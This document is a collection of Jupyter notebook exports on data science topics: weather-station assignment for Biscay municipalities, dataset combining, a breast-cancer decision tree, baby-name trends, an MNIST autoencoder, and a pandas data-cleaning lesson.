41 POINT (513424.801 4786444.656)
Name: UTM_points, dtype: geometry
###Markdown
Use the same code to add a new column with the distance (for checking purposes).
###Code
#Here the loop is calculating for each Municipality the distance of stations and giving the minimum distance only
distance_stations_list = []
for i in biscay_gdf.UTM_points:
distance_stations_list.append(round(stations_gdf.geometry.distance(i).min(),0))
'''
Need to check how to get min distance, maybe using the "closest station" column created previously and finding it
in the stations_gdf
'''
# Create a new series with the new list
distance_stations_series = pd.Series(distance_stations_list,name="station_distance(meters)")
# The newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["station_distance(meters)"] = distance_stations_series.astype(int)
# Manually replace the station that does not exist in WBds02_METEO.csv
# first find the index for the Municipality to assign a new station
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"])
# then extract the 2nd closest weather station
biscay_zaratamo_48097_dis = round(stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2)[1],0)
biscay_basauri_48015_dis = round(stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2)[1],0)
biscay_galdakao_48036_dis = round(stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2)[1],0)
# then replace the value in the DataFrame to later save as a .csv file
biscay_gdf.at[97,"station_distance(meters)"] = biscay_zaratamo_48097_dis
biscay_gdf.at[23,"station_distance(meters)"] = biscay_basauri_48015_dis
biscay_gdf.at[41,"station_distance(meters)"] = biscay_galdakao_48036_dis
###Output
97 POINT (510759.931 4783835.490)
Name: UTM_points, dtype: geometry
23 POINT (509085.637 4786507.059)
Name: UTM_points, dtype: geometry
41 POINT (513424.801 4786444.656)
Name: UTM_points, dtype: geometry
###Markdown
Use the same code to add a new series with the number of stations that lie within each Municipality, using the .within() method.
###Code
#Here the loop is calculating for each Municipality the sum of stations that are within the Municipality
number_stations_list = []
for i in biscay_gdf.geometry:
number_stations_list.append(stations_gdf.geometry.within(i).sum())
# Create a new series with the new list
number_stations_series = pd.Series(number_stations_list,name="number_stations")
# The newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["number_of_stations"] = number_stations_series
###Output
_____no_output_____
###Markdown
Use the same code to add a new series with the coordinates of closest stations for each Municipality in order to map them and be able to check if the distances calculated seem correct.
###Code
closest_stations_coords_list = []
for i in biscay_gdf.UTM_points:
closest_stations_coords_list.append(stations_gdf.loc[stations_gdf.geometry.distance(i).idxmin(),"geometry"])
# Create a new series with the new list
closest_stations_coords_series = gpd.GeoSeries(closest_stations_coords_list)
# The newly created Series as a new column for each Municipality showing the closest station
biscay_gdf["closest_station_UTM"] = closest_stations_coords_series
# Manually replace the station that does not exist in WBds02_METEO.csv
# first find the index for the Municipality to assign a new station
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"])
print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"])
# then extract the 2nd closest weather station
biscay_zaratamo_48097_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1]
biscay_basauri_48015_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1]
biscay_galdakao_48036_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1]
# then replace the value in the DataFrame to later save as a .csv file
biscay_gdf.at[97,"closest_station_UTM"] = biscay_zaratamo_48097_point
biscay_gdf.at[23,"closest_station_UTM"] = biscay_basauri_48015_point
biscay_gdf.at[41,"closest_station_UTM"] = biscay_galdakao_48036_point
# check if the replaced values for C0B2 look to have worked properly
biscay_gdf.loc[biscay_gdf.code_municipality.isin(["48097","48015","48036"]),:]
###Output
_____no_output_____
###Markdown
Save CSV with new assigned Weather Stations for each Municipality Finally, save the csv file to upload to Github, keeping the current format by slicing and adapting the current layout.
###Code
# Save file as CSV to replace WBds01_weather2municipality.csv
# 1st) extract station_code to maintain same format as Github csv
biscay_gdf.closest_station = biscay_gdf.closest_station.apply(str)
station_code = biscay_gdf.closest_station.str.split(", ", n=3, expand=True)
station_code = station_code.iloc[:,1].str.replace("'","")
station_code = pd.Series(station_code, name="station_code")
# insert station_code series in biscay_gdf
biscay_gdf["station_code"] = station_code
# rename municipality code column to maintain same format as csv file
biscay_gdf.rename({"code_municipality":"municip_code"}, axis=1, inplace=True)
# 2nd) create DataFrame that has the same format as the csv file in Github with the new stations assigned to a Municipality
WBds01_weather2municipality = pd.DataFrame(data = biscay_gdf, columns= ["station_code","municip_code"])
WBds01_weather2municipality.sort_values(by="municip_code", ascending=True, inplace=True)
# 3rd) save the new csv file
WBds01_weather2municipality.to_csv("WBds01_GEO.csv", index=False)
###Output
_____no_output_____
###Markdown
Double Check / Spot Mistakes Inspect the newly Created GDF and perform some checks
###Code
biscay_gdf.info()
biscay_gdf
# run this and inspect df in Excel to spot if there are obvious mistakes
#biscay_gdf.to_excel("weather_to_municp.xlsx", index=False)
# if empty, then no municipality assigned to station C0B2 (which is not present in our METEO dataset)
biscay_gdf.loc[biscay_gdf.station_code.str.contains("C0B2"),:]
###Output
_____no_output_____
###Markdown
Plot the Result in a Map - Do a quick check to see if it is working correctly, plotting the distances in a map. - JC suggests using it for EDA
###Code
#Generate a new GDF with index as Municipalities to be able to groupby
biscay_gdf2 = biscay_gdf.set_index("municipality")
#Get the Closest Stations Geometry Coordinate Points
station_points_gdf = biscay_gdf2.closest_station_UTM
#Get the Municipality's average center Coordinate Points
municipality_points_gdf = biscay_gdf2.UTM_points
#Append in a new Dataframe to then groupby and generate using the Linestrings method
#lines from Municipality center point to the Stations Point
path_df = station_points_gdf.append(municipality_points_gdf)
#Groupby Municipality and Get the LineString to have a path object
path_df = path_df.groupby(by="municipality").apply(list).apply(lambda x: LineString(x)).reset_index()
#Columns is empty so rename it to "geometry"
path_df.rename({0:"geometry"},axis=1,inplace=True)
#Set the geometry column as type Geometry & the CRS to "EPSG:25830" (same as other projections)
path_gdf = gpd.GeoDataFrame(path_df, geometry=path_df.geometry)
path_gdf.crs = "EPSG:25830"
# Set basemaps
ax = biscay_gdf.plot(figsize=(20, 20), zorder=2, color='#ffffd4', edgecolor='#bf5b17')
surrounding_regions_gdf.plot(zorder=1, color='#f7f7f7', edgecolor='#737373', ax=ax)
# Set results plots
path_gdf.plot(label="Path to assigned Weather Station", zorder=2,linestyle='-', linewidth=1, ax=ax)
municipality_points_gdf.plot(label="Municipality Center", color='green',markersize=20, zorder=3, ax=ax)
stations_gdf.plot(label="Weather Stations", color='#cc4c02',markersize=40, zorder=4, ax=ax)
# Set legends
ax.legend(loc='upper left', shadow=True, fontsize='xx-large', markerscale = 2)
# Set axis titles
ax.set_title('Weather Stations assigned to Biscay Municipalities',
pad = 20,
fontdict={'fontsize':25, 'color': '#4873ab'})
ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16})
ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16})
ax.set_xlim(461500, 550000)
ax.set_ylim(4757000, 4813000)
ax.set_facecolor('#4292c6')
plt.plot()
#plt.savefig("assigned_weather_stations_map.png")
###Output
_____no_output_____ |
dataprep/combine_datasets.ipynb | ###Markdown
Combining Data
###Code
dataset = pd.DataFrame()
dataset['path'] = images1 + '/' + df1['id_code'] + '.' + ext1
dataset['level'] = df1['diagnosis']
dataset.head()
dataset2 = pd.DataFrame()
dataset2['path'] = images2 + '/' + df2['image'] + '.' + ext2
dataset2['level'] = df2['level']
dataset2.head()
dataset = dataset.append(dataset2, ignore_index=True)
dataset['level'].value_counts()
dataset = dataset.sort_values(by='level', ascending=False)
dataset = dataset.head(dataset['level'].value_counts()[1]*2)
dataset['level'].value_counts()
###Output
_____no_output_____
###Markdown
Splitting
###Code
from sklearn.model_selection import train_test_split
train, test = train_test_split(dataset, test_size=0.25)
train.head()
BASE_PATH = "/mnt/Datasets/datasets/"
train.to_csv(os.path.join(BASE_PATH, 'combined_train_split.csv'), index=False)
test.to_csv(os.path.join(BASE_PATH, 'combined_test_split.csv'), index=False)
###Output
_____no_output_____ |
Lab4/CE121_Lab4_02.ipynb | ###Markdown
CE-121
###Code
#Import scikit-learn dataset library
from sklearn import datasets
from sklearn import preprocessing
from sklearn.tree import DecisionTreeClassifier
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Load dataset
bcancer = datasets.load_breast_cancer()
# print the names of the 30 features
print("Features: ",bcancer.feature_names)
# print the label type of cancer(malignant, benign)
print("Labels: ",bcancer.target_names)
# print data(feature)shape
print("data shape: ",bcancer.data.shape)
#print target shape
print("target shape: ",bcancer.target.shape)
print(bcancer.keys())
dataset = pd.DataFrame(bcancer.data, columns=[bcancer.feature_names])
#dataset['Target'] = pd.Series(data=bcancer.target, index=dataset.index)
dataset['target']=bcancer.target
print(dataset.tail())
y_enc=dataset.iloc[:,30]
print(y_enc)
le=preprocessing.LabelEncoder()
y_enc=le.fit_transform(y_enc)
print(y_enc)
dataset=dataset.drop(['target'],axis=1)
print(dataset.tail())
ohe=preprocessing.OneHotEncoder(dtype=int)  # np.int is deprecated in recent NumPy; the built-in int behaves the same here
x_enc=ohe.fit_transform(dataset)
print(x_enc)
print(ohe.get_feature_names(bcancer.feature_names))
print(len(ohe.get_feature_names(bcancer.feature_names)))
from pandas.core.common import random_state
#train test division(50%-50%)
from sklearn.model_selection import train_test_split
X_train, X_test, Y_train, Y_test = train_test_split(x_enc,y_enc, test_size = 0.50,random_state=121)
print(X_train)
#create DecisionTree model
dtc=DecisionTreeClassifier(criterion="entropy",random_state=121,max_leaf_nodes=121)
dtc.fit(X_train,Y_train)
pred_op=dtc.predict(X_test)
print("predicted output: ",pred_op)
print("actual test output: ",Y_test)
from sklearn import metrics
print("Accuracy is :- ",metrics.accuracy_score(Y_test, pred_op))
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
precision = precision_score(Y_test, pred_op)
recall = recall_score(Y_test, pred_op)
print("precision :- ",precision)
print("recall :- ",recall)
# from sklearn.tree import export_graphviz
# export_graphviz(dtc,out_file='tree_entropy.dot',
# feature_names=ohe.get_feature_names(bcancer.feature_names),class_names=list(bcancer.target_names),
# filled=True,max_depth=122)
# #convert to png
# from subprocess import call
# call(['dot', '-Tpng', 'tree_entropy.dot', '-o', 'tree_entropy.png', '-Gdpi=600'])
# # Display in python
# import matplotlib.pyplot as plt
# plt.figure(figsize = (14, 18))
# plt.imshow(plt.imread('tree_entropy.png'))
# plt.axis('off');
# plt.show();
from sklearn.metrics import confusion_matrix
confusion_matrix(Y_test, pred_op)
disp = metrics.plot_confusion_matrix(dtc, X_test, Y_test)
disp.figure_.suptitle("Confusion Matrix")
print("Confusion matrix:\n",disp.confusion_matrix)
plt.show()
###Output
Confusion matrix:
[[ 6 89]
[ 3 187]]
|
content/blog/notebooks/2016/02/ssn-names.ipynb | ###Markdown
ReproduceIt is a series of articles that reproduce the results from data analysis articles, focusing on having open data and open code. Today, as a small return for the [ReproduceIt series](http://danielfrg.com/tag/reproduceit.html), I try to reproduce a simple but nice data analysis and webapp that [braid.io](http://braid.io/) did, called [Most Beyonces are 14 years old and most Kanyes are about 11](http://braid.io/tile/name-trends). The article analyses the trend of names of some music artists (Beyonce, Kanye and Madonna) in the US; it also has some nice possible explanations for the ups and downs in time, and it's a quick read. The data comes from the Social Security Administration and can be downloaded from the [SSN website: Beyond the Top 1000 Names](https://www.ssa.gov/oact/babynames/limits.html). The data is very small, and loading it into pandas and plotting it with Bokeh was very easy.
###Code
%matplotlib inline
import pandas as pd
import os
data_dir = os.path.expanduser("~/data/names/names")
files = os.listdir(data_dir)
data = pd.DataFrame(columns=["year", "name", "sex", "occurrences"])
for fname in files:
if fname.endswith(".txt"):
fpath = os.path.join(data_dir, fname)
df = pd.read_csv(fpath, header=None, names=["name", "sex", "occurrences"])
df["year"] = int(fname[3:7])
data = data.append(df)
data.year = data.year.astype(int)
data.head()
data.shape
data.dtypes
###Output
_____no_output_____
###Markdown
BeyonceNow that the data is into a simple dataframe we can just filter by the name we want and make a Bar Chart.
###Code
beyonce = data[data["name"] == "Beyonce"][["year", "occurrences"]]
from bokeh.charts import ColumnDataSource, Bar, output_notebook, show
from bokeh.models import HoverTool
output_notebook()
p = Bar(data=beyonce, label="year", values="occurrences", title="No. Babies named Beyoncé",
color="#0277BD", ylabel='', tools="save,reset")
show(p)
###Output
_____no_output_____ |
chapter_2/ch2_autoencoder.ipynb | ###Markdown
Load MNIST dataset
###Code
(ds_train, ds_test_), ds_info = tfds.load('mnist',
split=['train', 'test'],
shuffle_files=True,
as_supervised=True,
with_info=True)
batch_size = 256
def preprocess(image, label):
image = tf.cast(image, tf.float32)
image = image/255.
return image, image
ds_train = ds_train.map(preprocess)
ds_train = ds_train.cache() # put dataset into memory
ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples)
ds_train = ds_train.batch(batch_size)
ds_test = ds_test_.map(preprocess).batch(batch_size).cache().prefetch(batch_size)
# return label for testing
def preprocess_with_label(image, label):
image = tf.cast(image, tf.float32)
image = tf.math.round(image/255.)
return image, label
ds_test_label = ds_test_.map(preprocess_with_label).batch(1000)
###Output
_____no_output_____
###Markdown
Building Autoencoder
###Code
def Encoder(z_dim):
inputs = layers.Input(shape=[28,28,1])
x = inputs
x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x)
x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x)
x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = Flatten()(x)
out = Dense(z_dim)(x)
return Model(inputs=inputs, outputs=out, name='encoder')
def Decoder(z_dim):
inputs = layers.Input(shape=[z_dim])
x = inputs
x = Dense(7*7*64, activation='relu')(x)
x = Reshape((7,7,64))(x)
x = Conv2D(filters=64, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = UpSampling2D((2,2))(x)
x = Conv2D(filters=32, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x)
x = UpSampling2D((2,2))(x)
out = Conv2D(filters=1, kernel_size=(3,3), strides=1, padding='same', activation='sigmoid')(x)
#return out
return Model(inputs=inputs, outputs=out, name='decoder')
class Autoencoder:
def __init__(self, z_dim):
self.encoder = Encoder(z_dim)
self.decoder = Decoder(z_dim)
model_input = self.encoder.input
model_output = self.decoder(self.encoder.output)
self.model = Model(model_input, model_output)
autoencoder = Autoencoder(z_dim=10)
model_path = "./models/autoencoder.h5"
checkpoint = ModelCheckpoint(model_path,
monitor= "val_loss",
verbose=1,
save_best_only=True,
mode= "auto",
save_weights_only = False)
early = EarlyStopping(monitor= "val_loss",
mode= "auto",
patience = 5)
callbacks_list = [checkpoint, early]
autoencoder.model.compile(
loss = "bce",
optimizer=tf.keras.optimizers.RMSprop(learning_rate=3e-4))
#metrics=[tf.keras.losses.BinaryCrossentropy()])
autoencoder.model.fit(ds_train, validation_data=ds_test,
epochs = 100, callbacks = callbacks_list)
###Output
Epoch 1/100
235/235 [==============================] - ETA: 0s - loss: 0.2658
Epoch 00001: val_loss improved from inf to 0.18209, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 8ms/step - loss: 0.2658 - val_loss: 0.1821
Epoch 2/100
235/235 [==============================] - ETA: 0s - loss: 0.1691
Epoch 00002: val_loss improved from 0.18209 to 0.14860, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1691 - val_loss: 0.1486
Epoch 3/100
232/235 [============================>.] - ETA: 0s - loss: 0.1472
Epoch 00003: val_loss improved from 0.14860 to 0.13958, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1471 - val_loss: 0.1396
Epoch 4/100
227/235 [===========================>..] - ETA: 0s - loss: 0.1379
Epoch 00004: val_loss improved from 0.13958 to 0.13258, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1378 - val_loss: 0.1326
Epoch 5/100
230/235 [============================>.] - ETA: 0s - loss: 0.1325
Epoch 00005: val_loss improved from 0.13258 to 0.12724, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1324 - val_loss: 0.1272
Epoch 6/100
235/235 [==============================] - ETA: 0s - loss: 0.1287
Epoch 00006: val_loss improved from 0.12724 to 0.12569, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1287 - val_loss: 0.1257
Epoch 7/100
233/235 [============================>.] - ETA: 0s - loss: 0.1259
Epoch 00007: val_loss improved from 0.12569 to 0.12421, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1260 - val_loss: 0.1242
Epoch 8/100
234/235 [============================>.] - ETA: 0s - loss: 0.1237
Epoch 00008: val_loss improved from 0.12421 to 0.12303, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1237 - val_loss: 0.1230
Epoch 9/100
232/235 [============================>.] - ETA: 0s - loss: 0.1220
Epoch 00009: val_loss improved from 0.12303 to 0.12149, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1219 - val_loss: 0.1215
Epoch 10/100
234/235 [============================>.] - ETA: 0s - loss: 0.1205
Epoch 00010: val_loss improved from 0.12149 to 0.11844, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1205 - val_loss: 0.1184
Epoch 11/100
228/235 [============================>.] - ETA: 0s - loss: 0.1191
Epoch 00011: val_loss did not improve from 0.11844
235/235 [==============================] - 1s 6ms/step - loss: 0.1191 - val_loss: 0.1199
Epoch 12/100
233/235 [============================>.] - ETA: 0s - loss: 0.1180
Epoch 00012: val_loss improved from 0.11844 to 0.11633, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1180 - val_loss: 0.1163
Epoch 13/100
235/235 [==============================] - ETA: 0s - loss: 0.1170
Epoch 00013: val_loss improved from 0.11633 to 0.11440, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1170 - val_loss: 0.1144
Epoch 14/100
229/235 [============================>.] - ETA: 0s - loss: 0.1161
Epoch 00014: val_loss did not improve from 0.11440
235/235 [==============================] - 1s 6ms/step - loss: 0.1161 - val_loss: 0.1186
Epoch 15/100
232/235 [============================>.] - ETA: 0s - loss: 0.1154
Epoch 00015: val_loss did not improve from 0.11440
235/235 [==============================] - 1s 6ms/step - loss: 0.1153 - val_loss: 0.1145
Epoch 16/100
234/235 [============================>.] - ETA: 0s - loss: 0.1146
Epoch 00016: val_loss improved from 0.11440 to 0.11381, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1146 - val_loss: 0.1138
Epoch 17/100
234/235 [============================>.] - ETA: 0s - loss: 0.1140
Epoch 00017: val_loss did not improve from 0.11381
235/235 [==============================] - 1s 6ms/step - loss: 0.1140 - val_loss: 0.1139
Epoch 18/100
233/235 [============================>.] - ETA: 0s - loss: 0.1133
Epoch 00018: val_loss improved from 0.11381 to 0.11224, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1133 - val_loss: 0.1122
Epoch 19/100
234/235 [============================>.] - ETA: 0s - loss: 0.1127
Epoch 00019: val_loss improved from 0.11224 to 0.11138, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1127 - val_loss: 0.1114
Epoch 20/100
227/235 [===========================>..] - ETA: 0s - loss: 0.1122
Epoch 00020: val_loss improved from 0.11138 to 0.11081, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1122 - val_loss: 0.1108
Epoch 21/100
226/235 [===========================>..] - ETA: 0s - loss: 0.1118
Epoch 00021: val_loss improved from 0.11081 to 0.11079, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1118 - val_loss: 0.1108
Epoch 22/100
234/235 [============================>.] - ETA: 0s - loss: 0.1113
Epoch 00022: val_loss improved from 0.11079 to 0.11058, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1113 - val_loss: 0.1106
Epoch 23/100
232/235 [============================>.] - ETA: 0s - loss: 0.1109
Epoch 00023: val_loss improved from 0.11058 to 0.11040, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1109 - val_loss: 0.1104
Epoch 24/100
229/235 [============================>.] - ETA: 0s - loss: 0.1105
Epoch 00024: val_loss improved from 0.11040 to 0.10948, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1105 - val_loss: 0.1095
Epoch 25/100
230/235 [============================>.] - ETA: 0s - loss: 0.1101
Epoch 00025: val_loss did not improve from 0.10948
235/235 [==============================] - 1s 6ms/step - loss: 0.1101 - val_loss: 0.1119
Epoch 26/100
234/235 [============================>.] - ETA: 0s - loss: 0.1098
Epoch 00026: val_loss did not improve from 0.10948
235/235 [==============================] - 1s 6ms/step - loss: 0.1098 - val_loss: 0.1105
Epoch 27/100
227/235 [===========================>..] - ETA: 0s - loss: 0.1094
Epoch 00027: val_loss improved from 0.10948 to 0.10876, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1094 - val_loss: 0.1088
Epoch 28/100
226/235 [===========================>..] - ETA: 0s - loss: 0.1091
Epoch 00028: val_loss did not improve from 0.10876
235/235 [==============================] - 1s 6ms/step - loss: 0.1091 - val_loss: 0.1093
Epoch 29/100
235/235 [==============================] - ETA: 0s - loss: 0.1088
Epoch 00029: val_loss improved from 0.10876 to 0.10870, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1088 - val_loss: 0.1087
Epoch 30/100
231/235 [============================>.] - ETA: 0s - loss: 0.1085
Epoch 00030: val_loss improved from 0.10870 to 0.10839, saving model to ./models/autoencoder.h5
235/235 [==============================] - 1s 6ms/step - loss: 0.1085 - val_loss: 0.1084
Epoch 31/100
228/235 [============================>.] - ETA: 0s - loss: 0.1082
Epoch 00031: val_loss did not improve from 0.10839
235/235 [==============================] - 1s 6ms/step - loss: 0.1082 - val_loss: 0.1098
Epoch 32/100
232/235 [============================>.] - ETA: 0s - loss: 0.1079
Epoch 00032: val_loss did not improve from 0.10839
235/235 [==============================] - 1s 6ms/step - loss: 0.1079 - val_loss: 0.1084
Epoch 33/100
229/235 [============================>.] - ETA: 0s - loss: 0.1076
Epoch 00033: val_loss improved from 0.10839 to 0.10712, saving model to ./models/autoencoder.h5
235/235 [==============================] - 2s 6ms/step - loss: 0.1077 - val_loss: 0.1071
###Markdown
Sample and Display Images
###Code
images, labels = next(iter(ds_test))
autoencoder.model = load_model(model_path)
outputs = autoencoder.model.predict(images)
# Display
grid_col = 10
grid_row = 2
f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col*1.1, grid_row))
i = 0
for row in range(0, grid_row, 2):
for col in range(grid_col):
axarr[row,col].imshow(images[i,:,:,0], cmap='gray')
axarr[row,col].axis('off')
axarr[row+1,col].imshow(outputs[i,:,:,0], cmap='gray')
axarr[row+1,col].axis('off')
i += 1
f.tight_layout(0.1, h_pad=0.2, w_pad=0.1)
plt.show()
###Output
_____no_output_____
###Markdown
Set z_dim = 2 to look at the latent variables
###Code
autoencoder_2 = Autoencoder(z_dim=2)
early = EarlyStopping(monitor= "val_loss",
mode= "auto",
patience = 5)
callbacks_list = [early]
autoencoder_2.model.compile(
loss = "bce",
optimizer=tf.keras.optimizers.RMSprop(learning_rate=1e-3))
autoencoder_2.model.fit(ds_train, validation_data=ds_test,
epochs = 50, callbacks = callbacks_list)
images, labels = next(iter(ds_test_label))
outputs = autoencoder_2.encoder.predict(images)
plt.figure(figsize=(8,8))
plt.scatter(outputs[:,0], outputs[:,1], c=labels, cmap='RdYlBu', s=3)
plt.colorbar()
z_samples = np.array([[z1, z2] for z2 in np.arange(-5, 5, 1.) for z1 in np.arange(-5, 5, 1.)])
images = autoencoder_2.decoder.predict(z_samples)
grid_col = 10
grid_row = 10
f, axarr = plt.subplots(grid_row, grid_col, figsize=(grid_col, grid_row))
i = 0
for row in range(grid_row):
for col in range(grid_col):
axarr[row,col].imshow(images[i,:,:,0], cmap='gray')
axarr[row,col].axis('off')
i += 1
f.tight_layout(0.1, h_pad=0.2, w_pad=0.1)
plt.show()
import ipywidgets as widgets
from ipywidgets import interact, interact_manual
@interact
def explore_latent_variable(z1 = (-5,5,0.1),
z2 = (-5,5,0.1)):
z_samples = [[z1, z2]]
images = autoencoder_2.decoder.predict(z_samples)
plt.figure(figsize=(2,2))
plt.imshow(images[0,:,:,0], cmap='gray')
###Output
_____no_output_____ |
book/2-pandas-datacleaning.ipynb | ###Markdown
Data Cleaning with Pandas Overview Questions: What does 'clean data' mean? How can I drop unnecessary data from my dataframe? How can I change column or row names in a dataframe? How can I cast columns to the correct data type? Objectives: Use pandas to drop unnecessary data from our dataframe. Learn how to rename pandas columns. Use pandas string methods to correct characters. Learn how to cast columns to the correct data type. Keypoints: Data cleaning prepares data for analysis. Pandas has built-in methods for handling data cleaning, particularly missing data. In this section, we'll read in the data we extracted in the last lesson. You may have noticed in the last session that the data in these dataframes didn't look great. There were columns that appeared to have no values. Once we start working with the data, we are going to see some additional problems.
###Code
import os
import pandas as pd
fpath = os.path.join("data", "potts_table1.csv")
fpath2 = os.path.join("data", "potts_table2.csv")
table1 = pd.read_csv(fpath)
table2 = pd.read_csv(fpath2)
table1.head()
###Output
_____no_output_____
###Markdown
Dropping unnecessary data In some cases, we might have data in our dataframe that we don't need. We will want to discard or "drop" this data from the dataframe. For the dataframe we just loaded, for example, we can see that the data in columns 0, 1, 4, 12 appear to not have any values. Check your understanding: What pandas method can you use to see how many non-null values you have in each column? Solution: `table1.info()`. There are two methods you might use to drop data from a dataframe. These are `drop` and `dropna`. Drop is used when you have specific rows or columns you want to remove from the dataframe, while `dropna` is used when you want to drop columns or rows which contain `NaN` or "not a number" values. This occurs when there are no values in a data cell. In the output of `info` above, we can see that there are two columns which contain 0 non-null values. This means that all of the values in these columns are `NaN`. We can safely discard these columns. We'll use the `dropna` function to get rid of them.
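As a quick illustration of the difference (using a hypothetical dataframe `df`, not the tables loaded above):

```python
# drop: remove rows or columns you name explicitly
df = df.drop(columns=["Unnamed: 0"])        # drop a specific column by name
df = df.drop(index=[0, 1])                  # drop specific rows by label

# dropna: remove rows or columns based on missing (NaN) values
df = df.dropna(axis="columns", how="all")   # drop columns that are entirely NaN
df = df.dropna(axis="index", how="any")     # drop rows containing any NaN
```

Before applying `dropna` to our own table, let's look at its documentation.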
###Code
help(table1.dropna)
###Output
Help on method dropna in module pandas.core.frame:
dropna(axis=0, how='any', thresh=None, subset=None, inplace=False) method of pandas.core.frame.DataFrame instance
Remove missing values.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine if rows or columns which contain missing values are
removed.
* 0, or 'index' : Drop rows which contain missing values.
* 1, or 'columns' : Drop columns which contain missing value.
.. versionchanged:: 1.0.0
Pass tuple or list to drop on multiple axes.
Only a single axis is allowed.
how : {'any', 'all'}, default 'any'
Determine if row or column is removed from DataFrame, when we have
at least one NA or all NA.
* 'any' : If any NA values are present, drop that row or column.
* 'all' : If all values are NA, drop that row or column.
thresh : int, optional
Require that many non-NA values.
subset : array-like, optional
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
DataFrame or None
DataFrame with NA entries dropped from it or None if ``inplace=True``.
See Also
--------
DataFrame.isna: Indicate missing values.
DataFrame.notna : Indicate existing (non-missing) values.
DataFrame.fillna : Replace missing values.
Series.dropna : Drop missing values.
Index.dropna : Drop missing indices.
Examples
--------
>>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
... "toy": [np.nan, 'Batmobile', 'Bullwhip'],
... "born": [pd.NaT, pd.Timestamp("1940-04-25"),
... pd.NaT]})
>>> df
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Drop the rows where at least one element is missing.
>>> df.dropna()
name toy born
1 Batman Batmobile 1940-04-25
Drop the columns where at least one element is missing.
>>> df.dropna(axis='columns')
name
0 Alfred
1 Batman
2 Catwoman
Drop the rows where all elements are missing.
>>> df.dropna(how='all')
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep only the rows with at least 2 non-NA values.
>>> df.dropna(thresh=2)
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Define in which columns to look for missing values.
>>> df.dropna(subset=['name', 'toy'])
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep the DataFrame with valid entries in the same variable.
>>> df.dropna(inplace=True)
>>> df
name toy born
1 Batman Batmobile 1940-04-25
###Markdown
Before saving the dataframe, we'll look at and discuss the output from this function. By default, the function `dropna` will work on `axis=0`, the rows of the dataframe, and will drop any row which contains a `NaN`. You will see this results in a dataframe with no data.
###Code
table1.dropna()
###Output
_____no_output_____
###Markdown
Notice that `dropna` returns a dataframe and does not overwrite the original.
###Code
table1.info()
###Output
